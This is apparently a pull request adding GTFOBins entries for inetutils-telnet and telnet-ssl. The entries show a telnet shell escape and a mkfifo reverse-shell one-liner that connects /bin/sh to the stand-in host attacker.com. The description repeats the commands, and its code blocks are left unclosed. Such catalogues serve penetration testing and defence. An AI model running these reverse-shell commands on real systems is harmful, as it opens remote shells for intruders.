### PR TITLE
Inetutils telnet

### DIFF
--- a/_gtfobins/inetutils-telnet
+++ b/_gtfobins/inetutils-telnet
@@ -1,0 +1,15 @@
+---
+comment: inetutils-telnet can be abused to execute commands or create reverse shells.
+functions:
+  shell:
+    - comment: Spawns a shell through the telnet command escape feature.
+      code: |
+        inetutils-telnet
+        !/bin/sh
+  reverse-shell:
+    - comment: Creates a reverse shell using inetutils-telnet and a named pipe.
+      code: |
+        mkfifo /path/to/temp-socket
+        inetutils-telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket
+      tty: false
+      listener: TCP

--- a/_gtfobins/telnet-ssl
+++ b/_gtfobins/telnet-ssl
@@ -1,0 +1,15 @@
+---
+comment: telnet-ssl can be abused to create reverse shells through a named pipe.
+functions:
+  reverse-shell:
+    - comment: Creates a reverse shell using telnet-ssl and a named pipe.
+      code: |
+        mkfifo /path/to/temp-socket
+        telnet-ssl attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket
+      tty: false
+      listener: TCP
+      contexts:
+        unprivileged:
+          code: |
+            mkfifo /path/to/temp-socket
+            telnet-ssl attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket


### PR DESCRIPTION
## Add inetutils-telnet shell and reverse-shell capabilities

This pull request adds a new GTFOBins entry for `inetutils-telnet`.

`inetutils-telnet` provides multiple abuse primitives that can be used for command execution and remote shell access.

### Shell

The telnet client supports command execution through its escape command feature:

```bash
inetutils-telnet
!/bin/sh

```bash
mkfifo /path/to/temp-socket
inetutils-telnet attacker.com 12345 </path/to/temp-socket | /bin/sh >/path/to/temp-socket